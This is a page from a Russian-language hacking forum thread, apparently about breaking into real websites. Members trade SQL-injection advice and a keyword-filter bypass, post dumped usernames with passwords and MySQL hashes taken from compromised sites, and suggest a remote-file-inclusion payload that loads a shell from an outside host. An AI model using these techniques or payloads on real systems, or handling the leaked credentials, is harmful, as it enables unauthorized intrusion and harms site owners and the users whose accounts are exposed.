ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1021  
Старый 22.02.2008, 03:30
Аватар для fobofob
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

Я понял,но хня заключается в том что кроме версии,юзера и бд,нифига не выходит,хотя версия муси 5 information_schema не пашет,мож там фильтрация стоит какая, как на хостинге спайсвеб на from?

Последний раз редактировалось fobofob; 22.02.2008 в 03:38..
 
Ответить с цитированием

  #1022  
Старый 22.02.2008, 03:44
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

fobofob, подбирай таблицы вручную
 
Ответить с цитированием

  #1023  
Старый 22.02.2008, 14:16
Аватар для o3,14um
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

Цитата:
Сообщение от fobofob  
Я понял,но хня заключается в том что кроме версии,юзера и бд,нифига не выходит,хотя версия муси 5 information_schema не пашет,мож там фильтрация стоит какая, как на хостинге спайсвеб на from?
Конечно не пашет! там не вильтрация, а ограничение прав. Те ж сказали, что даётся 1 БД на сайт. Значит всё просто, только столбцы нужно подобрать. А чтобы узнать имя БД - зарегай се аккаунт и посмотри. Вобщем проанализируй там всё.

а фильтрации часто можно обходить так. Например, если слово from, то FrOm frFROMom. Но на джино нет фильтрации

P.S. В разделе XSS я выладивал как активную, так и пассиивную.

Последний раз редактировалось o3,14um; 22.02.2008 в 14:18..
 
Ответить с цитированием

  #1024  
Старый 22.02.2008, 16:04
Аватар для fobofob
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

и еще вопросик, что это за кодировка паролей :
art:=Ы#џlu/њ$ )
volov:FШ
bazin:VШЦб(¦
rozonova:NЕоА
gaponov:VМВ/юШ
malvina:з[^
anna:eЛдIн > (· ? что это не хеши я знаю,так как на другом сайте с этим движком пароли в открытом виде
 
Ответить с цитированием

  #1025  
Старый 22.02.2008, 16:15
Аватар для o3,14um
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

а может быть это просто кодировка дргуая?! Попробуй открыть ИнтернетЭксплорером и кодировку сменить на "автовыбор" или ещё чё...
 
Ответить с цитированием

  #1026  
Старый 23.02.2008, 00:48
Аватар для CaNNabi$
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию

Цитата:
Сообщение от m0use  
нашел один сай sql... из mysql.user version() - 4.1.20
достал логины и шеши
bla:*7E031FB695D422377447A5660A3B95FED283B260
bla:*7CDBD368F59FA498366CBEC09B7A5C2BAF06D045
потом пошли
bla:3bb4472d333b8afa
......
потом снова такого вида
bla:*7E031FB695D422355967A5660A3B95FED283B260
что это все значит
Это логин и хэш) если я не ошибаюсь =)
Цитата:
bla:*7E031FB695D422377447A5660A3B95FED283B260
Это я не знаю че за шифровка)

А это
Цитата:
bla:3bb4472d333b8afa
Хэш MySQL =)
Вот ТУТ FAQ по хэшам
 
Ответить с цитированием

  #1027  
Старый 23.02.2008, 02:09
Аватар для Dr.Z3r0
Dr.Z3r0
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482

Репутация: 1796
По умолчанию

Цитата:
Сообщение от CaNNabi$  
Цитата:
bla:*7E031FB695D422377447A5660A3B95FED283B260
Это я не знаю че за шифровка)
Это печально... Если мне не изменяет память это хеш пятого мускула
__________________
Кто я?..
 
Ответить с цитированием

вопрос по IIS и Microsoft .NET Framework
  #1028  
Старый 24.02.2008, 02:53
Аватар для neon_fx
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию вопрос по IIS и Microsoft .NET Framework

Такой вопрос
Есть уязвимость, точнее есть ошибка в скрипте
при воде левых данных выводит
Invalid path for MapPath 'Skins/Default/Modules\../../../..].ascx'. A virtual path is expected.
тоесть в конце пути скрипт добавляет расширение ascx
пробовал добавить %00
непомогло
Подскажите плиз что делать
 
Ответить с цитированием

  #1029  
Старый 24.02.2008, 03:00
Аватар для Piflit
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию

попробуй param=http://site.com/shell.txt?
 
Ответить с цитированием

  #1030  
Старый 24.02.2008, 03:05
Аватар для o3,14um
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

попробуй добавить ?
и плюс попробуй "инклудить" файлы, что звщищены .htaccess
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ